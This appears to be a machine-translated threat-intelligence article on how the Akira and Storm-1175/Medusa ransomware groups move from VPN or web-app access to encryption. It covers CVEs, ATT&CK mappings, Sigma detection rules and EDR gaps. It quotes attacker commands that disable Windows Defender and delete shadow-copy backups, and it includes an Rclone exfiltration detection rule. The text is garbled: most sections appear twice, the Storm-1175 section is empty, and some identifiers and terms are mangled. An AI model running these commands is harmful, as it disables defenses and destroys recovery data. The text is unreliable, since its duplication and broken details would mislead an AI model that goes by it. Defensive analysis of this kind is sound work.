According to CrowdStrike Global Threat Report 2025, the average time of the lateral movement after initial access in 2024 is 62 minutes. A year earlier, there were 84. Record - 51 seconds from foothold before moving over the network. Fifty-one seconds. Two groupings set this pace: Akira with playbook attacks through VPN devices and Storm-1175 is the operator Medusa RaaS, which, according to Microsoft Threat Intelligence, deploys encryption in less than 24 hours, using zero-day in web applications. According to ransomware.live, only in the first week of June 2026, Akira published data from 9 new victims - from production companies (T/CCI Manufacturing, NSPA) to financial services and the hotel business. Below - analysis of the hatching chain of both groups with reference to verified CVE and MITRE AT&CK, specific Sigma rules and a checklist that makes sense at such a timeline.
Why ransomware groupings attack speed
Speed for ransomware operator - direct repay multiplier. The shorter the time from the initial access to impact (time-to-ransom), the less chance of SOC notice the anomaly and break the kill chain. According to Verizon DBIR 2025, the median redemption is $46 000, the maximum fixed is $75 million.
Three factors move the acceleration trend:
1. EDR/XDR-maturity is growing - with a long dwell time, the defenders have more chances for a detect. Groups like Storm-1175 deliberately compress the window to watches, slipping under the response threshold.
2. Automation post-exploitation - RMM-tools (AnyDesk, Atera, ConnectWise ScreenConnect), Cloudflare tunnels and scripts for credential harvesting allow you to go through the stages of kill chain parallel. One operator does what a team needed before.
3. Double extortion - exfiltration occurs before encryption. Even if the victim recovers from the backups, the threat of data publishing remains a lever of pressure.
For pentesters and security engineers, the output is direct: if your mean response to MTTR exceeds 4 hours - both groups will finish the work before the first aertel. According to IBM X-Force, the average time between CVE publishing and the use of a patch in organizations is 29 months. Twenty Nine. Akira and Storm-1175 use CISA KEV, which are being operated in the wild right now.
Kill chain Akira ransomware: from VPN to encryption
According to public DFIR reports, Akira works on a playbook approach with a clear sequence of stages. The grouping is associated with the Conti ecosystem (the similarity of the payload code, template TTPs). Model - double extex: exfiltration, encryption, ransom requirement.
Initial access and privilege escalation
[Applicable: external pentest, legacy and modern infrastructure with VPN without MFA]
The main vector is an SSL VPN device without multifactor authentication. Evolution of initial access in two years:
2023–2024: Cisco ASA. Two CVE in the bundle:
• CVE-2023-20269 (CVSS 5.0, Medium; CWE-288 Authentication Bypass, CWE-863 Incorrect Authorization) - allows an unauthentic attacker to conduct brute force of accounts, and the authenticated - to establish an unauthorised clientless SSL VPN session on Cisco ASA and Firepower Threath Defense. In CISA KEV since September 2023, it is marked as used in ransomware campaigns.
• CVE-2020-3259 (CVSS 7.5, High; CWE-200 Information Disclosure) - the disclosure of the contents of memory via the Cisco ASA/FTD web interface. The attacker receives sensitive data, including accounts, without authentication. EPSS 0.6973 (Top 5%). CISA KEV since February 2024.
Affects SonicWall Gen 5, Gen 6, Gen 7 (SonicOS 7.0.1-5035 and before). CISA KEV since September 2024.
After receiving VPN access, Akira will climb to Veeam for privilege escalation:
• CVE-2023-27532 (CVSS 7.5, High; CWE-306 Missing Authentication for Critical Function) is the extraction of encrypted credentials from the configuration of the Veeam Backup & Replication. This data often includes domain admin accounting. EPSS 0.8381 (Top 1% - extremely high probability of operation). Script Veeam-Get-Creds.ps1A passwords in a cleartext from the SQL-base.
• CVE-2024-40711 (CVSS 9.8, CWE-502 Deserialization of Untrusted Data) - RCE through degeneration without authentication in Veeam Backup & Replication. EPSS 0.7046 (Top 5%). CISA KEV since October 2024.
Both Veeam vulnerabilities are classic broken access control (OWASP A01): access to critical features without proper authentication. VPN devices left without patches for months are a typical example of security misconfiguration (OWASP A07). Nothing new, but it works smoothly.
Lateral movement, evasion and ransomware impact
[Applicable: internal pentest, infrastructure with Windows AD]
Intelligence: Netscan, Advanced Port Scanner, PowerShell scripts for collecting AD data are the main set of DFIR reports. Less - Powerview, Sharphoound, Pingcastle.
Lateral movement Predominantly RDP (T1021.001, Remote Desktop Protocol) For ESXi and NAS - SSH. In some cases, the attackers deployed their own VM within the network to bypass the endpoint protection (elegant move, I must admit). Tools: NetExec, PsExec, Impacket atexec.py.
C2 - mainly AnyDesk and OpenSSH. Isolated cases: Ligolo-ng, Cobalt Strike. The bet on legitimate RMM creates a key issue for the detect: AnyDesk from the attacker is indistinguishable from AnyDesk IT department. And it's not a bug, it's a feature of their approach.
Evasion (T1685, Disable or Modify Tools) - manual shutdown AV/EDR. Windows Defender is often extinguished through Set-MpPreference -DisableRealtimeMonitoring $true or modification of the registry DisableAntiSpyware.
Exfiltration (T1560.001, Archive via Utility) - mainly WinRAR, less often 7-Zip. Sending: WinSCP, FileZilla, Rclone. The shortest recorded case of exfiltration is less than three hours.
Impact (T1486, Data Encrypted for Impact; T1490, Inhibit System Recovery) - purposeful destruction of backups: vssadmin delete shadows /all /quiet, formatting disks. VMDK/VHDX encryption at the hypervisor level. Payload: w.exe, akira.exe, locker.exe. Expansion .akira. Early versions (2023) contained a cryptographic error - a single Chaha20/8 key for all files on the host - which allowed Avast to create a decryptor. In the current samples, this mistake, most likely, has already closed.
Kill chain Storm-1175: zero-day and Medusa ransomware in 24 hours
Three intersections - three detect points: Rclone, disconnection of protective solutions, deletion of shadow copies.
Sigma Rules for ransomware Compromise Indicators
Rclone Extillation Detect - both Akira and Storm-1175 are used. Rclone on servers where the utility is not installed by the IT department is a compromise indicator.
Detector of shadow copies - the last frontier before encryption (T1490, Inhibit System Recovery) If this alter that worked, there are minutes left until the encryption.
Additionally, it is worth monitoring: access to LSASS with GrantedAccess 0x1010 or 0x1FFFFF (Sysmon EventID 10), mass creation of local accounts with addenda to the Administrators group, registry modification DisableAntiSpyware.
Where the detect is broken: analysis on EDR-Vendora
The effectiveness of the detect is critically dependent on the product and configuration. Generalization "EDR will catch" - an empty sound without vendor-specific:
CrowdStrike Falcon Behavioral analytics detects mass encryption and vssadmin delete shadows. Problem: AnyDesk as C2 - Falcon sees a legitimate signed binary. The detect works in the presence of baseline “AnyDesk is not expected on this host”. When agent (Akira regularly uses this) Falcon may not have time to send telemetry if tamper protection is not activated.
Elastic 8.x+ with kernel ETW-TI - strong LSASS protection: detects direct dump via Task Manager, blocks Mimikatz. Weakness: RMM-based C2 (Atera, ConnectWise) generates network traffic indistinguishable from regular administration without allow-lists.
SentinelOne - the behavioral engine catches the mass renaming and encryption of files in real time. Vulnerability: If the attacker disconnects the agent through the service password (obtained from compromised AD-registered), the protection is neutralized before the start of encryption.
The common problem for all three: Both groups first extinguish the defense, then encrypted. If an EDR agent can be deactivated with local admin rights without confirmation from the cloud console (tameter protection is turned off or configured) - kill chain is clear.
Why ransomware groupings attack speed
Speed for ransomware operator - direct repay multiplier. The shorter the time from the initial access to impact (time-to-ransom), the less chance of SOC notice the anomaly and break the kill chain. According to Verizon DBIR 2025, the median redemption is $46 000, the maximum fixed is $75 million.
Three factors move the acceleration trend:
1. EDR/XDR-maturity is growing - with a long dwell time, the defenders have more chances for a detect. Groups like Storm-1175 deliberately compress the window to watches, slipping under the response threshold.
2. Automation post-exploitation - RMM-tools (AnyDesk, Atera, ConnectWise ScreenConnect), Cloudflare tunnels and scripts for credential harvesting allow you to go through the stages of kill chain parallel. One operator does what a team needed before.
3. Double extortion - exfiltration occurs before encryption. Even if the victim recovers from the backups, the threat of data publishing remains a lever of pressure.
For pentesters and security engineers, the output is direct: if your mean response to MTTR exceeds 4 hours - both groups will finish the work before the first aertel. According to IBM X-Force, the average time between CVE publishing and the use of a patch in organizations is 29 months. Twenty Nine. Akira and Storm-1175 use CISA KEV, which are being operated in the wild right now.
Kill chain Akira ransomware: from VPN to encryption
According to public DFIR reports, Akira works on a playbook approach with a clear sequence of stages. The grouping is associated with the Conti ecosystem (the similarity of the payload code, template TTPs). Model - double extex: exfiltration, encryption, ransom requirement.
Initial access and privilege escalation
[Applicable: external pentest, legacy and modern infrastructure with VPN without MFA]
The main vector is an SSL VPN device without multifactor authentication. Evolution of initial access in two years:
2023–2024: Cisco ASA. Two CVE in the bundle:
• CVE-2023-20269 (CVSS 5.0, Medium; CWE-288 Authentication Bypass, CWE-863 Incorrect Authorization) - allows an unauthentic attacker to conduct brute force of accounts, and the authenticated - to establish an unauthorised clientless SSL VPN session on Cisco ASA and Firepower Threath Defense. In CISA KEV since September 2023, it is marked as used in ransomware campaigns.
• CVE-2020-3259 (CVSS 7.5, High; CWE-200 Information Disclosure) - the disclosure of the contents of memory via the Cisco ASA/FTD web interface. The attacker receives sensitive data, including accounts, without authentication. EPSS 0.6973 (Top 5%). CISA KEV since February 2024.
Affects SonicWall Gen 5, Gen 6, Gen 7 (SonicOS 7.0.1-5035 and before). CISA KEV since September 2024.
After receiving VPN access, Akira will climb to Veeam for privilege escalation:
• CVE-2023-27532 (CVSS 7.5, High; CWE-306 Missing Authentication for Critical Function) is the extraction of encrypted credentials from the configuration of the Veeam Backup & Replication. This data often includes domain admin accounting. EPSS 0.8381 (Top 1% - extremely high probability of operation). Script Veeam-Get-Creds.ps1A passwords in a cleartext from the SQL-base.
• CVE-2024-40711 (CVSS 9.8, CWE-502 Deserialization of Untrusted Data) - RCE through degeneration without authentication in Veeam Backup & Replication. EPSS 0.7046 (Top 5%). CISA KEV since October 2024.
Both Veeam vulnerabilities are classic broken access control (OWASP A01): access to critical features without proper authentication. VPN devices left without patches for months are a typical example of security misconfiguration (OWASP A07). Nothing new, but it works smoothly.
Lateral movement, evasion and ransomware impact
[Applicable: internal pentest, infrastructure with Windows AD]
Intelligence: Netscan, Advanced Port Scanner, PowerShell scripts for collecting AD data are the main set of DFIR reports. Less - Powerview, Sharphoound, Pingcastle.
Lateral movement Predominantly RDP (T1021.001, Remote Desktop Protocol) For ESXi and NAS - SSH. In some cases, the attackers deployed their own VM within the network to bypass the endpoint protection (elegant move, I must admit). Tools: NetExec, PsExec, Impacket atexec.py.
C2 - mainly AnyDesk and OpenSSH. Isolated cases: Ligolo-ng, Cobalt Strike. The bet on legitimate RMM creates a key issue for the detect: AnyDesk from the attacker is indistinguishable from AnyDesk IT department. And it's not a bug, it's a feature of their approach.
Evasion (T1685, Disable or Modify Tools) - manual shutdown AV/EDR. Windows Defender is often extinguished through Set-MpPreference -DisableRealtimeMonitoring $true or modification of the registry DisableAntiSpyware.
Exfiltration (T1560.001, Archive via Utility) - mainly WinRAR, less often 7-Zip. Sending: WinSCP, FileZilla, Rclone. The shortest recorded case of exfiltration is less than three hours.
Impact (T1486, Data Encrypted for Impact; T1490, Inhibit System Recovery) - purposeful destruction of backups: vssadmin delete shadows /all /quiet, formatting disks. VMDK/VHDX encryption at the hypervisor level. Payload: w.exe, akira.exe, locker.exe. Expansion .akira. Early versions (2023) contained a cryptographic error - a single Chaha20/8 key for all files on the host - which allowed Avast to create a decryptor. In the current samples, this mistake, most likely, has already closed.
Kill chain Storm-1175: zero-day and Medusa ransomware in 24 hours
Three intersections - three detect points: Rclone, disconnection of protective solutions, deletion of shadow copies.
Sigma Rules for ransomware Compromise Indicators
Rclone Extillation Detect - both Akira and Storm-1175 are used. Rclone on servers where the utility is not installed by the IT department is a compromise indicator.
Limitation: If Rclone is used by IT for legitimate backups, you will need a whitelist on the path of installation and target storage. Without filtration, there will be false positives.YAML:
title: Rclone Exfiltration - Akira/Storm-1175
logsource:
category: process_creation
product: windows
detection:
sel_img: {Image|endswith: '\rclone.exe'}
sel_cmd: {CommandLine|contains|any: ['sync', 'copy', ':s3:', '']}
condition: sel_img and sel_cmd
level: high
Detector of shadow copies - the last frontier before encryption (T1490, Inhibit System Recovery) If this alter that worked, there are minutes left until the encryption.
Limitation: the legitimate removal of shadow copies with a lack of disk space occurs, but extremely rarely with the parameters /all /quiet.
Additionally, it is worth monitoring: access to LSASS with GrantedAccess 0x1010 or 0x1FFFFF (Sysmon EventID 10), mass creation of local accounts with addenda to the Administrators group, registry modification DisableAntiSpyware.
Where the detect is broken: analysis on EDR-Vendora
The effectiveness of the detect is critically dependent on the product and configuration. Generalization "EDR will catch" - an empty sound without vendor-specific:
CrowdStrike Falcon Behavioral analytics detects mass encryption and vssadmin delete shadows. Problem: AnyDesk as C2 - Falcon sees a legitimate signed binary. The detect works in the presence of baseline “AnyDesk is not expected on this host”. When agent (Akira regularly uses this) Falcon may not have time to send telemetry if tamper protection is not activated.
Elastic 8.x+ with kernel ETW-TI - strong LSASS protection: detects direct dump via Task Manager, blocks Mimikatz. Weakness: RMM-based C2 (Atera, ConnectWise) generates network traffic indistinguishable from regular administration without allow-lists.
SentinelOne - the behavioral engine catches the mass renaming and encryption of files in real time. Vulnerability: If the attacker disconnects the agent through the service password (obtained from compromised AD-registered), the protection is neutralized before the start of encryption.
The common problem for all three: Both groups first extinguish the defense, then encrypted. If an EDR agent can be deactivated with local admin rights without confirmation from the cloud console (tameter protection is turned off or configured) - kill chain is clear.
